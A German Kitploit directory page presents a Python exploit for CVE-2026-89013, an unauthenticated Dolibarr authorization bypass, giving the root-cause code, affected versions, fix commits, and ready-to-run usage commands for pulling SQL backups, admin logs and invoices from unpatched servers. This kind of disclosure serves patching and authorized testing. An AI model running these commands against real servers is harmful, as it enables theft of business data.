Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-89013 — Python-Exploit für CVE-2026-89013, eine unauthentifizierte Dolibarr-Hashp-Autorisierungsumgehung, die beliebiges Dateilesen ermöglicht, mit den Modi check, list, hunt, read und download. | Kitploit
Tools/GitHubGitHub/faceless0x7/cve-2026-89013
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungWebsicherheitPenetrationstestsAuthentifizierung
GitHubfaceless0x7/cve-2026-89013

CVE-2026-89013

Python-Exploit für CVE-2026-89013, eine unauthentifizierte Dolibarr-Hashp-Autorisierungsumgehung, die beliebiges Dateilesen ermöglicht, mit den Modi check, list, hunt, read und download.

1vor 16h 11mNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-89013 — Dolibarr hashp=shared Autorisierungsumgehung

Exploit für CVE-2026-89013: document.php und viewimage.php erzwingen NOLOGIN, wenn der Parameter hashp vorhanden ist. Der interne Markerwert shared überspringt die Share-Token-Auflösung, aber die Zugriffskontroll-Überschreibung greift dennoch für jeden nicht-leeren Wert und setzt $accessallowed = 1, wodurch das Ergebnis von dol_check_secure_access_document() verworfen wird. Eine nicht authentifizierte Anfrage kann daher jede Datei in jedem modulepart-Baum lesen: Geschäftsdokumente, Admin-Logs, SQL- Backups (modulepart=systemtools), Quellcode benutzerdefinierter Module (modulepart=packages) und andere Multicompany-Entitäten über .

&entity=N

Record: https://www.cve.org/CVERecord?id=CVE-2026-89013

BetroffenDolibarr 23.0.4 – 24.0.0
Behoben24.0.1
Voraussetzungenkeine (nicht authentifiziert)
Auswirkungbeliebiges Dateilesen innerhalb der von Dolibarr verwalteten Verzeichnisse

Ursache

root@kitploit:~
// htdocs/document.php:189 (24.0.0) — 'shared' skips token resolution
if (!empty($hashp) && $hashp != 'shared') { ...resolve share token... }

// htdocs/document.php:292 — but any hashp forces access
if (!empty($hashp)) {
    $accessallowed = 1;
    $sqlprotectagainstexternals = '';
}

Eine Regression von Commit 5028dae981e (2026-08-12), erstmals ausgeliefert in 23.0.4 und 24.0.0. Traversal (../) wird serverseitig bereinigt — dies ist eine Autorisierungsumgehung, kein Path Traversal.

Verwendung

root@kitploit:~
# detection (safe, nonexistent canary file)
python3 CVE-2026-89013.py https://erp.local check

# readable modulepart trees
python3 CVE-2026-89013.py https://erp.local list

# hunt: dolibarr.log + SQL backups (generated filenames) + user vcards
python3 CVE-2026-89013.py https://erp.local hunt --db-name dolibarr --days 3 --save

# read / download
python3 CVE-2026-89013.py https://erp.local read logs/admin/logs/dolibarr.log
python3 CVE-2026-89013.py https://erp.local download systemtools/backup/backup.sql
python3 CVE-2026-89013.py https://erp.local read facture/FA2601-0001/FA2601-0001.pdf --entity 2

# PDFs via viewimage.php
python3 CVE-2026-89013.py https://erp.local viewimage facture/FA2601-0001/FA2601-0001.pdf

Nur Standardbibliothek (Python 3.8+). Unterstützt --proxy, --insecure, --timeout.

demo

Referenzen

  • CVE-Eintrag: https://www.cve.org/CVERecord?id=CVE-2026-89013
  • Behobenes Release: https://github.com/Dolibarr/dolibarr/releases/tag/24.0.1
  • Fix-Commits:
    • https://github.com/Dolibarr/dolibarr/commit/cd05688dbed8a4af6eef32faf4fc1e823a37bce9
    • https://github.com/Dolibarr/dolibarr/commit/a8bc4a63e1b6356884abcd83c4a38954d9649b0b
    • https://github.com/Dolibarr/dolibarr/commit/3bd8aa8b909e596d7dab4388d0466ec24e6ad191
  • Regressionsursprung: https://github.com/Dolibarr/dolibarr/commit/5028dae981e47dfab349f8fe2ef79b54ae95d1b6

Haftungsausschluss

Nur für autorisierte Tests und Forschung. Nur gegen Systeme verwenden, die Sie besitzen oder für die Sie ausdrückliche Testgenehmigung haben.

Tool herunterladen